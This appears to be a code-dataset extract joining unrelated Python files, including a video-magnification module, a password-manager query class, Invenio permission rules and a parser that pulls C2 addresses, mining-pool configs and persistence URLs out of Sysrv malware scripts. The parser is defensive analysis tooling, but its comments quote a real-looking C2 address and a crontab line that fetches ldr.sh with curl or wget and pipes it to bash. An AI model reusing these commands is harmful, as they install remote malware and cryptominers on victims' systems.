# ignore the top and bottom of the pyramid. One end has too much noise and the other end is the
# gaussian representation
continue
bandpassed = temporal_bandpass_filter(vid, fps, freq_min=freq_min, freq_max=freq_max, amplification_factor=amplification)
# play_vid_data(bandpassed)
vid_pyramid[i] += bandpassed
# play_vid_data(vid_pyramid[i])
vid_data = collapse_laplacian_video_pyramid(vid_pyramid)
return vid_data
def show_frequencies(vid_data, fps, bounds=None):
"""Graph the average value of the video as well as the frequency strength"""
averages = []
if bounds:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, bounds[2]:bounds[3], bounds[0]:bounds[1], :].sum())
else:
for x in range(1, vid_data.shape[0] - 1):
averages.append(vid_data[x, :, :, :].sum())
    averages = np.array(averages) - min(averages)  # shift baseline so the minimum is zero
charts_x = 1
charts_y = 2
pyplot.figure(figsize=(20, 10))
pyplot.subplots_adjust(hspace=.7)
pyplot.subplot(charts_y, charts_x, 1)
pyplot.title("Pixel Average")
pyplot.xlabel("Time")
pyplot.ylabel("Brightness")
pyplot.plot(averages)
freqs = scipy.fftpack.fftfreq(len(averages), d=1.0 / fps)
fft = abs(scipy.fftpack.fft(averages))
idx = np.argsort(freqs)
pyplot.subplot(charts_y, charts_x, 2)
pyplot.title("FFT")
pyplot.xlabel("Freq (Hz)")
freqs = freqs[idx]
fft = fft[idx]
freqs = freqs[len(freqs) // 2 + 1:]
fft = fft[len(fft) // 2 + 1:]
pyplot.plot(freqs, abs(fft))
pyplot.show()
def gaussian_video(video, shrink_multiple):
"""Create a gaussian representation of a video"""
vid_data = None
for x in range(0, video.shape[0]):
frame = video[x]
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for i in range(shrink_multiple):
gauss_copy = cv2.pyrDown(gauss_copy)
if x == 0:
vid_data = np.zeros((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))
vid_data[x] = gauss_copy
return vid_data
def laplacian_video(video, shrink_multiple):
vid_data = None
frame_count, height, width, colors = video.shape
for i, frame in enumerate(video):
gauss_copy = np.ndarray(shape=frame.shape, dtype="float")
gauss_copy[:] = frame
for _ in range(shrink_multiple):
prev_copy = gauss_copy[:]
gauss_copy = cv2.pyrDown(gauss_copy)
laplacian = prev_copy - cv2.pyrUp(gauss_copy)
if vid_data is None:
vid_data = np.zeros((frame_count, laplacian.shape[0], laplacian.shape[1], 3))
vid_data[i] = laplacian
return vid_data
def combine_pyramid_and_save(g_video, orig_video, enlarge_multiple, fps, save_filename='media/output.avi'):
"""Combine a gaussian video representation with the original and save to file"""
width, height = get_frame_dimensions(orig_video[0])
fourcc = cv2.VideoWriter_fourcc(*'MJPG')
print("Outputting to %s" % save_filename)
writer = cv2.VideoWriter(save_filename, fourcc, fps, (width, height), 1)
for x in range(0, g_video.shape[0]):
img = np.ndarray(shape=g_video[x].shape, dtype='float')
img[:] = g_video[x]
for i in range(enlarge_multiple):
img = cv2.pyrUp(img)
img[:height, :width] = img[:height, :width] + orig_video[x]
res = cv2.convertScaleAbs(img[:height, :width])
        writer.write(res)
    writer.release()
def get_frame_dimensions(frame):
"""Get the dimensions of a single frame"""
height, width = frame.shape[:2]
return width, height
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = scipy.signal.butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = scipy.signal.lfilter(b, a, data, axis=0)
return y
|
[
"matplotlib.pyplot.title",
"cv2.VideoWriter_fourcc",
"eulerian_magnification.pyramid.create_laplacian_video_pyramid",
"numpy.argsort",
"matplotlib.pyplot.figure",
"cv2.VideoWriter",
"cv2.pyrDown",
"numpy.ndarray",
"cv2.convertScaleAbs",
"matplotlib.pyplot.show",
"eulerian_magnification.transforms.temporal_bandpass_filter",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.ylabel",
"eulerian_magnification.pyramid.collapse_laplacian_video_pyramid",
"cv2.pyrUp",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.plot",
"numpy.zeros",
"matplotlib.pyplot.xlabel"
] |
[((473, 544), 'eulerian_magnification.pyramid.create_laplacian_video_pyramid', 'create_laplacian_video_pyramid', (['vid_data'], {'pyramid_levels': 'pyramid_levels'}), '(vid_data, pyramid_levels=pyramid_levels)\n', (503, 544), False, 'from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid\n'), ((1080, 1125), 'eulerian_magnification.pyramid.collapse_laplacian_video_pyramid', 'collapse_laplacian_video_pyramid', (['vid_pyramid'], {}), '(vid_pyramid)\n', (1112, 1125), False, 'from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid\n'), ((1651, 1682), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (1664, 1682), False, 'from matplotlib import pyplot\n'), ((1687, 1721), 'matplotlib.pyplot.subplots_adjust', 'pyplot.subplots_adjust', ([], {'hspace': '(0.7)'}), '(hspace=0.7)\n', (1709, 1721), False, 'from matplotlib import pyplot\n'), ((1726, 1763), 'matplotlib.pyplot.subplot', 'pyplot.subplot', (['charts_y', 'charts_x', '(1)'], {}), '(charts_y, charts_x, 1)\n', (1740, 1763), False, 'from matplotlib import pyplot\n'), ((1768, 1797), 'matplotlib.pyplot.title', 'pyplot.title', (['"""Pixel Average"""'], {}), "('Pixel Average')\n", (1780, 1797), False, 'from matplotlib import pyplot\n'), ((1802, 1823), 'matplotlib.pyplot.xlabel', 'pyplot.xlabel', (['"""Time"""'], {}), "('Time')\n", (1815, 1823), False, 'from matplotlib import pyplot\n'), ((1828, 1855), 'matplotlib.pyplot.ylabel', 'pyplot.ylabel', (['"""Brightness"""'], {}), "('Brightness')\n", (1841, 1855), False, 'from matplotlib import pyplot\n'), ((1860, 1881), 'matplotlib.pyplot.plot', 'pyplot.plot', (['averages'], {}), '(averages)\n', (1871, 1881), False, 'from matplotlib import pyplot\n'), ((1998, 2015), 'numpy.argsort', 'np.argsort', (['freqs'], {}), '(freqs)\n', (2008, 2015), True, 'import numpy as np\n'), ((2021, 2058), 'matplotlib.pyplot.subplot', 'pyplot.subplot', (['charts_y', 'charts_x', '(2)'], {}), '(charts_y, charts_x, 2)\n', (2035, 2058), False, 'from matplotlib import pyplot\n'), ((2063, 2082), 'matplotlib.pyplot.title', 'pyplot.title', (['"""FFT"""'], {}), "('FFT')\n", (2075, 2082), False, 'from matplotlib import pyplot\n'), ((2087, 2113), 'matplotlib.pyplot.xlabel', 'pyplot.xlabel', (['"""Freq (Hz)"""'], {}), "('Freq (Hz)')\n", (2100, 2113), False, 'from matplotlib import pyplot\n'), ((2269, 2282), 'matplotlib.pyplot.show', 'pyplot.show', ([], {}), '()\n', (2280, 2282), False, 'from matplotlib import pyplot\n'), ((3696, 3727), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'MJPG'"], {}), "(*'MJPG')\n", (3718, 3727), False, 'import cv2\n'), ((3787, 3850), 'cv2.VideoWriter', 'cv2.VideoWriter', (['save_filename', 'fourcc', 'fps', '(width, height)', '(1)'], {}), '(save_filename, fourcc, fps, (width, height), 1)\n', (3802, 3850), False, 'import cv2\n'), ((840, 952), 'eulerian_magnification.transforms.temporal_bandpass_filter', 'temporal_bandpass_filter', (['vid', 'fps'], {'freq_min': 'freq_min', 'freq_max': 'freq_max', 'amplification_factor': 'amplification'}), '(vid, fps, freq_min=freq_min, freq_max=freq_max,\n amplification_factor=amplification)\n', (864, 952), False, 'from eulerian_magnification.transforms import temporal_bandpass_filter\n'), ((2488, 2532), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'frame.shape', 'dtype': '"""float"""'}), "(shape=frame.shape, dtype='float')\n", (2498, 2532), True, 'import numpy as np\n'), ((3001, 3045), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'frame.shape', 'dtype': '"""float"""'}), "(shape=frame.shape, dtype='float')\n", (3011, 3045), True, 'import numpy as np\n'), ((3906, 3955), 'numpy.ndarray', 'np.ndarray', ([], {'shape': 'g_video[x].shape', 'dtype': '"""float"""'}), "(shape=g_video[x].shape, dtype='float')\n", (3916, 3955), True, 'import numpy as np\n'), ((4142, 4183), 'cv2.convertScaleAbs', 'cv2.convertScaleAbs', (['img[:height, :width]'], {}), '(img[:height, :width])\n', (4161, 4183), False, 'import cv2\n'), ((2629, 2652), 'cv2.pyrDown', 'cv2.pyrDown', (['gauss_copy'], {}), '(gauss_copy)\n', (2640, 2652), False, 'import cv2\n'), ((2696, 2767), 'numpy.zeros', 'np.zeros', (['(video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3)'], {}), '((video.shape[0], gauss_copy.shape[0], gauss_copy.shape[1], 3))\n', (2704, 2767), True, 'import numpy as np\n'), ((3181, 3204), 'cv2.pyrDown', 'cv2.pyrDown', (['gauss_copy'], {}), '(gauss_copy)\n', (3192, 3204), False, 'import cv2\n'), ((3238, 3259), 'cv2.pyrUp', 'cv2.pyrUp', (['gauss_copy'], {}), '(gauss_copy)\n', (3247, 3259), False, 'import cv2\n'), ((3313, 3379), 'numpy.zeros', 'np.zeros', (['(frame_count, laplacian.shape[0], laplacian.shape[1], 3)'], {}), '((frame_count, laplacian.shape[0], laplacian.shape[1], 3))\n', (3321, 3379), True, 'import numpy as np\n'), ((4044, 4058), 'cv2.pyrUp', 'cv2.pyrUp', (['img'], {}), '(img)\n', (4053, 4058), False, 'import cv2\n')]
|
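A minimal end-to-end sketch of the pipeline above; the input file name, frame rate, and frequency band are assumptions, not part of the captured source:
# Hypothetical driver: amplify the ~1 Hz (pulse) band of a short clip.
cap = cv2.VideoCapture('media/face.avi')  # hypothetical input file
frames = []
while True:
    ok, frame = cap.read()
    if not ok:
        break
    frames.append(frame.astype(np.float64) / 255.0)
cap.release()
vid_data = np.asarray(frames)
amplified = eulerian_magnification(vid_data, fps=30.0, freq_min=0.8,
                                   freq_max=1.0, amplification=50)
show_frequencies(vid_data, fps=30.0)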
from constants.database import PASSWORD_MANAGER_COLLECTION_NAME, PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD, PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD, PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD
from constants.request_parameters import BODY_DOMAIN_PARAM, BODY_USERNAME_PARAM, BODY_SECRET_PARAM, BODY_MASTER_PASSWORD_PARAM, BODY_QUERY_TYPE_PARAM, BODY_MASTER_KEY_PARAM, QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE, QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE
from constants.response_messages import ERROR_MULTIPLE_RECORDS_FOUND_FOR_DECRYPTING_SECRETS, ERROR_NO_RECORD_FOUND
from crypto.decrypter import Decrypter
class QueryProcessor:
"""A wrapper class for processing query requests
Attributes:
collection (Collection): The password manager collection object.
domain (str): The domain for the record.
username (str): The username for the record.
decrypter (Decrypter): The Decrypter object to decrypt the secrets. Only initialized if query type is QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE.
query_type (str): The type of query.
"""
collection = None
domain = None
username = None
decrypter = None
query_type = None
def __init__(self, request, dbclient):
"""
Args:
request (Request): The flask request object received from the client.
dbclient (DbClient): The database client object.
"""
self.collection = dbclient.get_collection(
PASSWORD_MANAGER_COLLECTION_NAME)
self.query_type = request.form.get(BODY_QUERY_TYPE_PARAM)
if self.query_type == QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE:
master_password = request.form.get(BODY_MASTER_PASSWORD_PARAM)
master_key = int(request.form.get(BODY_MASTER_KEY_PARAM))
self.decrypter = Decrypter(master_password, master_key)
self.domain = request.form.get(BODY_DOMAIN_PARAM)
self.username = request.form.get(BODY_USERNAME_PARAM)
def process(self):
"""Queries the password manager collection.
If query type is QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE, it filters the records by domain (and username).
If query type is QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE, it decrypts the secrets and returns them if and only if a single record is found for requested domain (and username).
"""
if self.query_type == QUERY_SEARCH_BY_DOMAIN_AND_USERNAME_TYPE:
cursor = self.collection.find()
return self.__filter_by_domain_and_username(cursor)
elif self.query_type == QUERY_GET_SECRETS_FOR_DOMAIN_AND_USERNAME_TYPE:
cursor = None
            if self.username is None:
cursor = self.collection.find({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: self.domain
})
else:
cursor = self.collection.find({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: self.domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: self.username
})
if cursor.count() > 1:
raise Exception(
ERROR_MULTIPLE_RECORDS_FOUND_FOR_DECRYPTING_SECRETS)
elif cursor.count() == 0:
raise Exception(ERROR_NO_RECORD_FOUND)
else:
record = cursor.next()
return {
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: record[PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD],
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: record[PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD],
PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD: self.__decrypt_secrets(
record[PASSWORD_MANAGER_COLLECTION_SECRETS_FIELD])
}
def __filter_by_domain_and_username(self, cursor):
"""Filters the cursor by domain (and username if specified in request).
        For a match, the lowercased parameter from the request must be a substring of the corresponding field in the collection.
Args:
cursor (Cursor): The cursor object which is a result of find()/find_one() on a collection object.
Returns:
list: A list of filtered objects having domain and username.
"""
result = []
for _ in range(cursor.count()):
record = cursor.next()
domain = record[PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD]
username = record[PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD]
if self.domain.lower() in domain.lower():
                if self.username is not None:
if self.username.lower() in username.lower():
result.append({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: username
})
else:
result.append({
PASSWORD_MANAGER_COLLECTION_DOMAIN_FIELD: domain,
PASSWORD_MANAGER_COLLECTION_USERNAME_FIELD: username
})
return result
def __decrypt_secrets(self, secrets):
"""Decrypts all the secrets in a list.
Args:
secrets (list): List of encrypted secrets to decrypt.
Returns:
list: List of corresponding decrypted secrets.
"""
        assert self.decrypter is not None
return [self.decrypter.decrypt(secret) for secret in secrets]
|
[
"crypto.decrypter.Decrypter"
] |
[((1833, 1871), 'crypto.decrypter.Decrypter', 'Decrypter', (['master_password', 'master_key'], {}), '(master_password, master_key)\n', (1842, 1871), False, 'from crypto.decrypter import Decrypter\n')]
|
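A minimal sketch of wiring this class into a Flask endpoint; `app` and `dbclient` are assumed to be created elsewhere and are not part of the captured source:
from flask import jsonify, request

@app.route('/query', methods=['POST'])  # hypothetical route
def handle_query():
    processor = QueryProcessor(request, dbclient)
    try:
        return jsonify(processor.process())
    except Exception as exc:
        return jsonify({'error': str(exc)}), 400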
# -*- coding: utf-8 -*-
#
# Copyright (C) 2018 CERN.
#
# invenio-app-ils is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Ils permissions."""
from __future__ import absolute_import, print_function
from functools import wraps
from flask import abort, current_app
from flask_login import current_user
from flask_principal import UserNeed
from invenio_access import action_factory
from invenio_access.permissions import Permission, authenticated_user
from invenio_records_rest.utils import allow_all, deny_all
from invenio_app_ils.proxies import current_app_ils
backoffice_access_action = action_factory("ils-backoffice-access")
def need_permissions(action):
"""View decorator to check permissions for the given action or abort.
:param action: The action needed.
"""
def decorator_builder(f):
@wraps(f)
def decorate(*args, **kwargs):
check_permission(
current_app.config["ILS_VIEWS_PERMISSIONS_FACTORY"](action)
)
return f(*args, **kwargs)
return decorate
return decorator_builder
def check_permission(permission):
"""Abort if permission is not allowed.
:param permission: The permission to check.
"""
if permission is not None and not permission.can():
if not current_user.is_authenticated:
abort(401)
abort(403)
def backoffice_permission(*args, **kwargs):
"""Return permission to allow only librarians and admins."""
return Permission(backoffice_access_action)
def file_download_permission(obj):
"""File download permissions."""
bucket_id = str(obj.bucket_id)
search_cls = current_app_ils.eitem_search_cls
results = search_cls().search_by_bucket_id(bucket_id)
if len(results) != 1:
return deny_all()
eitem_cls = current_app_ils.eitem_record_cls
record = eitem_cls.get_record_by_pid(results[0].pid)
if record.get("open_access", False):
return allow_all()
return authenticated_user_permission()
def files_permission(obj, action=None):
"""Return permission for Files REST."""
if action == "object-read":
return file_download_permission(obj)
return backoffice_permission()
class LoanOwnerPermission(Permission):
"""Return Permission to evaluate if the current user owns the loan."""
def __init__(self, record):
"""Constructor."""
super(LoanOwnerPermission, self).__init__(
UserNeed(int(record["patron_pid"])), backoffice_access_action
)
class DocumentRequestOwnerPermission(Permission):
"""Return Permission to evaluate if the current user owns the request."""
def __init__(self, record):
"""Constructor."""
super(DocumentRequestOwnerPermission, self).__init__(
UserNeed(int(record["patron_pid"])), backoffice_access_action
)
def authenticated_user_permission(*args, **kwargs):
"""Return an object that evaluates if the current user is authenticated."""
return Permission(authenticated_user)
def views_permissions_factory(action):
"""Return ILS views permissions factory."""
if action == "circulation-loan-request":
return authenticated_user_permission()
elif action == "circulation-loan-checkout":
return backoffice_permission()
elif action == "circulation-loan-force-checkout":
return backoffice_permission()
elif action == "circulation-overdue-loan-email":
return backoffice_permission()
elif action == "relations-create":
return backoffice_permission()
elif action == "relations-delete":
return backoffice_permission()
elif action == "stats-most-loaned":
return backoffice_permission()
elif action == "document-request-accept":
return backoffice_permission()
elif action == "document-request-pending":
return backoffice_permission()
elif action == "document-request-reject":
return backoffice_permission()
elif action == "bucket-create":
return backoffice_permission()
else:
return deny_all()
def circulation_permission(patron_pid):
"""Return circulation status permission for a patron."""
return Permission(UserNeed(int(patron_pid)), backoffice_access_action)
|
[
"flask.abort",
"functools.wraps",
"invenio_access.action_factory",
"invenio_access.permissions.Permission",
"invenio_records_rest.utils.deny_all",
"invenio_records_rest.utils.allow_all"
] |
[((678, 717), 'invenio_access.action_factory', 'action_factory', (['"""ils-backoffice-access"""'], {}), "('ils-backoffice-access')\n", (692, 717), False, 'from invenio_access import action_factory\n'), ((1573, 1609), 'invenio_access.permissions.Permission', 'Permission', (['backoffice_access_action'], {}), '(backoffice_access_action)\n', (1583, 1609), False, 'from invenio_access.permissions import Permission, authenticated_user\n'), ((3087, 3117), 'invenio_access.permissions.Permission', 'Permission', (['authenticated_user'], {}), '(authenticated_user)\n', (3097, 3117), False, 'from invenio_access.permissions import Permission, authenticated_user\n'), ((910, 918), 'functools.wraps', 'wraps', (['f'], {}), '(f)\n', (915, 918), False, 'from functools import wraps\n'), ((1440, 1450), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (1445, 1450), False, 'from flask import abort, current_app\n'), ((1868, 1878), 'invenio_records_rest.utils.deny_all', 'deny_all', ([], {}), '()\n', (1876, 1878), False, 'from invenio_records_rest.utils import allow_all, deny_all\n'), ((2042, 2053), 'invenio_records_rest.utils.allow_all', 'allow_all', ([], {}), '()\n', (2051, 2053), False, 'from invenio_records_rest.utils import allow_all, deny_all\n'), ((1421, 1431), 'flask.abort', 'abort', (['(401)'], {}), '(401)\n', (1426, 1431), False, 'from flask import abort, current_app\n'), ((4162, 4172), 'invenio_records_rest.utils.deny_all', 'deny_all', ([], {}), '()\n', (4170, 4172), False, 'from invenio_records_rest.utils import allow_all, deny_all\n')]
|
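A minimal sketch of the decorator above on a hypothetical view; it assumes the application config sets ILS_VIEWS_PERMISSIONS_FACTORY to views_permissions_factory:
from flask import Blueprint, jsonify

blueprint = Blueprint('ils_stats', __name__)  # hypothetical blueprint

@blueprint.route('/circulation/stats/most-loaned')
@need_permissions('stats-most-loaned')
def most_loaned():
    return jsonify({'hits': []})  # placeholder payload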
import os
import inspect
from mishell.shell_family import Alpha
class sysrv_sh(Alpha):
NAME = "sysrv_sh"
def __init__(self):
super(sysrv_sh, self).__init__()
self.anchor_processor = {}
self.file_abs_path = None
self.lines = []
self._inspect_anchor_processor()
self.cache = {}
def _read_file(self, file_abs_path):
self.file_abs_path = file_abs_path
with open(file_abs_path, "r") as f:
self.lines = f.readlines()
def do(self, data, *args, **kwargs):
        for file_abs_path, anchor_dct in data.items():
            md5 = os.path.basename(file_abs_path)
            self._read_file(file_abs_path)
            self._find_anchor_processor(anchor_dct, md5)
def get_process_result(self):
pass
def _find_anchor_processor(self, anchor_dct, md5):
print("Processing md5 {}".format(md5))
for anchor, value in anchor_dct.items():
func = self.anchor_processor.get(anchor, None)
if func is not None:
func(anchor, value)
def _inspect_anchor_processor(self):
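        # Auto-register every bound method whose name starts with "anchor"
        # (e.g. anchor_cc, anchor_config) as the processor for that anchor key.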
for name, data in inspect.getmembers(self):
if name.startswith("anchor") and inspect.ismethod(data):
self.anchor_processor[name] = data
# cc=http://185.239.242.71
def anchor_cc(self, anchor, value):
for line in self.lines:
line = line.strip()
if line.startswith(value):
try:
url = line.split("=")[1]
print(url)
except Exception as e:
return
# {"url": "pool.minexmr.com:5555", "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxP<KEY>"},
# {"url": "xmr.f2pool.com:13531", "user": "<KEY>", "pass": "x"}
def anchor_config(self, anchor, value):
for line in self.lines:
line = line.strip()
if line.startswith(value):
try:
import json
line = line.strip(",")
raw = json.loads(line)
url = raw["url"]
ip = url.split(":")[0]
port = url.split(":")[1]
wallet = raw["user"]
print(ip, port, wallet)
except Exception as e:
return
# echo "*/9 * * * * (curl -fsSL $cc/ldr.sh || wget -q -O - $cc/ldr.sh) | bash > /dev/null 2>&1" | crontab -
def anchor_persistent(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace(")", "")
print(url)
break
except Exception as e:
return
# get $cc/sysrr $sys; nohup ./$sys 1>/dev/null 2>&1 &
def anchor_get(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace("\"", "")
print(url)
break
except Exception as e:
return
# get "$cc/sysrv" $sys
def anchor_get_1(self, anchor, value):
for line in self.lines:
line = line.strip()
url = ""
if line.startswith(value):
try:
lst = line.split(" ")
for item in lst:
if item.startswith("\"$cc"):
for line in self.lines:
if line.startswith("cc="):
line = line.strip()
part1 = line.split("=")[1]
item = item.split("\"")[1]
url = part1 + "/" + item.split("/")[1]
url = url.replace("\"", "")
print(url)
break
except Exception as e:
return
|
[
"os.path.basename",
"inspect.ismethod",
"json.loads",
"inspect.getmembers"
] |
[((1148, 1172), 'inspect.getmembers', 'inspect.getmembers', (['self'], {}), '(self)\n', (1166, 1172), False, 'import inspect\n'), ((620, 651), 'os.path.basename', 'os.path.basename', (['file_abs_path'], {}), '(file_abs_path)\n', (636, 651), False, 'import os\n'), ((1219, 1241), 'inspect.ismethod', 'inspect.ismethod', (['data'], {}), '(data)\n', (1235, 1241), False, 'import inspect\n'), ((2102, 2118), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (2112, 2118), False, 'import json\n')]
|
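A minimal sketch of driving the class above; the sample path and the anchor-to-prefix mapping are assumptions, not part of the captured source:
processor = sysrv_sh()
processor.do({
    '/samples/0a1b2c3d4e5f': {        # hypothetical md5-named dropper script
        'anchor_cc': 'cc=',           # recover the C2 base URL
        'anchor_config': '{"url"',    # recover embedded miner pool configs
        'anchor_persistent': 'echo',  # recover the cron persistence URL
    },
})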
#!/usr/bin/env python
#python 2.7.5
#catcount.py
#Version 1. <NAME>, Feb 2017
#Contact, <NAME>, <EMAIL>
#############################################
# Concatenate count tables from HTSeq-count #
#############################################
import csv
import sys
import os
import copy
import argparse
import pandas as pd
def tempPathCheck(args):
absOutDir = os.path.abspath(args.outDir)
if not os.path.isdir(absOutDir):
os.makedirs(absOutDir)
return absOutDir
def getbasename(path):
base = os.path.splitext(os.path.basename(path))[0]
return base
def fetchrows(indexlist,filepath,args):
''' Add rownames to indexlist, make unique '''
newrows = list()
with open(filepath) as f:
c = csv.reader(f, delimiter='\t')
for line in c:
if args.featureNames:
if line[0].startswith(args.featureNames):
newrows.append(line[0])
else:
newrows.append(line[0])
oldrows = copy.deepcopy(indexlist)
catlist = oldrows + newrows
uniq_rows = set(catlist)
return list(uniq_rows)
def makeblankdf(args):
index = list()
columns = list()
for sample in args.inFiles:
setcount = 0
for split_sample in sample.split(','):
setcount += 1
if setcount == 1:
columns = columns + [getbasename(split_sample)]
index = fetchrows(index,split_sample,args)
elif setcount > 1:
index = fetchrows(index,split_sample,args)
index.sort()
columns.sort()
df = pd.DataFrame(index=index, columns=columns)
df = df.fillna(0).astype(int)
return df
def readcounts(colID,filepath,args):
rowcounts = dict()
with open(filepath) as f:
c = csv.reader(f, delimiter='\t')
for line in c:
if args.featureNames:
if line[0].startswith(args.featureNames):
rowcounts[line[0]] = line[1]
else:
rowcounts[line[0]] = line[1]
counts_df = pd.DataFrame.from_dict(rowcounts, orient='index', dtype='int64').astype(int)
counts_df.columns = [colID]
return counts_df
def populatetable(mastertable,filelist,args):
filledtable = copy.deepcopy(mastertable)
for sample in filelist:
setcount = 0
for merge_sample in sample.split(','):
setcount += 1
if setcount == 1:
sample_name = getbasename(merge_sample)
temp_df = readcounts(sample_name,merge_sample,args)
filledtable = filledtable.add(temp_df, fill_value=0)
elif setcount > 1:
temp_df = readcounts(sample_name,merge_sample,args)
filledtable = filledtable.add(temp_df, fill_value=0)
return filledtable.astype(int)
def main(args):
if args.inFiles is None:
sys.exit('No input files provided')
if args.outDir:
outdir = tempPathCheck(args)
outpath = os.path.join(outdir,args.outName)
else:
outpath = args.outName
mastertable = makeblankdf(args)
filledtable = populatetable(mastertable,args.inFiles,args)
outopen = open(outpath, 'w')
filledtable.to_csv(path_or_buf=outopen, sep='\t', header=True, index=True, line_terminator='\n')
outopen.close()
if __name__ == '__main__':
###Argument handling.
parser = argparse.ArgumentParser(
description='Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names.',
prog='catcount')
parser.add_argument("-i", "--inFiles",
type=str,
default=None,
nargs='+',
help="List of count files or pairs of files.")
parser.add_argument("-o", "--outName",
type=str,
default= "CatCounts.txt",
help="Write concatenated count table to this file.")
parser.add_argument("-d", "--outDir",
type=str,
default= None,
help="Directory for output file to be written to.")
parser.add_argument("-n", "--featureNames",
type=str,
default= None,
help="Keep feature names that start with this string. i.e. 'ge' will return 'gene_001'")
args = parser.parse_args()
    main(args)
|
[
"pandas.DataFrame",
"copy.deepcopy",
"os.path.abspath",
"csv.reader",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.basename",
"os.path.isdir",
"pandas.DataFrame.from_dict",
"os.path.join",
"sys.exit"
] |
[((363, 391), 'os.path.abspath', 'os.path.abspath', (['args.outDir'], {}), '(args.outDir)\n', (378, 391), False, 'import os\n'), ((893, 917), 'copy.deepcopy', 'copy.deepcopy', (['indexlist'], {}), '(indexlist)\n', (906, 917), False, 'import copy\n'), ((1382, 1424), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'index', 'columns': 'columns'}), '(index=index, columns=columns)\n', (1394, 1424), True, 'import pandas as pd\n'), ((1952, 1978), 'copy.deepcopy', 'copy.deepcopy', (['mastertable'], {}), '(mastertable)\n', (1965, 1978), False, 'import copy\n'), ((2936, 3152), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names."""', 'prog': '"""catcount"""'}), "(description=\n 'Takes a list of files containing counts by feature name and concatenates into single table. Can merge counts from comma separated pairs of file names.'\n , prog='catcount')\n", (2959, 3152), False, 'import argparse\n'), ((400, 424), 'os.path.isdir', 'os.path.isdir', (['absOutDir'], {}), '(absOutDir)\n', (413, 424), False, 'import os\n'), ((428, 450), 'os.makedirs', 'os.makedirs', (['absOutDir'], {}), '(absOutDir)\n', (439, 450), False, 'import os\n'), ((698, 727), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '"""\t"""'}), "(f, delimiter='\\t')\n", (708, 727), False, 'import csv\n'), ((1558, 1587), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '"""\t"""'}), "(f, delimiter='\\t')\n", (1568, 1587), False, 'import csv\n'), ((2469, 2504), 'sys.exit', 'sys.exit', (['"""No input files provided"""'], {}), "('No input files provided')\n", (2477, 2504), False, 'import sys\n'), ((2567, 2601), 'os.path.join', 'os.path.join', (['outdir', 'args.outName'], {}), '(outdir, args.outName)\n', (2579, 2601), False, 'import os\n'), ((518, 540), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (534, 540), False, 'import os\n'), ((1766, 1830), 'pandas.DataFrame.from_dict', 'pd.DataFrame.from_dict', (['rowcounts'], {'orient': '"""index"""', 'dtype': '"""int64"""'}), "(rowcounts, orient='index', dtype='int64')\n", (1788, 1830), True, 'import pandas as pd\n')]
|
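A typical invocation of the script above might look like this (file names are hypothetical); comma-joined inputs are summed into a single column named after the first file of the pair:
python catcount.py -i sampleA.counts lane1.counts,lane2.counts -o CatCounts.txt -d results -n ge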
"""Tests for module gromov """
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
